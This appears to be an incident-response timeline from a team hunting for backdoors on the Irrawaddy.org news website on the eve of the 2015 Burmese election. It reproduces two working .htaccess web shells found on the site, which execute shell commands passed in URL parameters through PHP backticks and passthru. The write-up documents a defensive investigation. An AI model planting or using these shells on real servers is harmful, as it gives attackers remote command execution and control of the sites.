Fighting Cyber Attacks during the Burmese Elections

7th Nov 15:00 PM – The IP address was involved in the October attacks!

Irrawaddy.org confirms that the very same IP address was involved in the attack to their website the 9th of October 2015 from the group “Union of Hacktivists”

7th Nov 16:30 PM – Looking for backdoors in the website

We received access credentials to look into backdoors in the website. The case is urgent as it is less than 12 hours for the Election day to start.

7th Nov 17:30 PM – No obvious evidence of malicious activity

Irrawaddy.org communicates that they believe that there is not clear signs that the site is compromised as the previous hack attempt was cleaned up by their current hosting provider.

7th Nov 17:52 PM – First backdoor found!

We found the first backdoor in the website. The backdoor executes shell commands passed in the URI using the variable “1”. Backticks in PHP they execute a command in the shell.

In feed/.htaccess

# cat feed/.htaccess

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess

<!--?=@`$_GET[1]`? >

7th Nov 19:34 PM – More backdoors…

Two previous attempts of backdooring the site are found:

wp-content/uploads/2015/01/htaccess (Jan 20 2015)
wp-content/staticfeed/htaccess (Jan 10 2015)

# Self contained .htaccess web shell - Part of the htshell project 
# Written by Wireghoul - http://www.justanotherhacker.com 
# Override default deny rule to make .htaccess file accessible over web 
<Files ~ "^.ht"> 
Order allow,deny 
Allow from all 
</Files> 

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file 
AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3 
<?php echo "n";passthru($_GET['c']." 2>&1");?>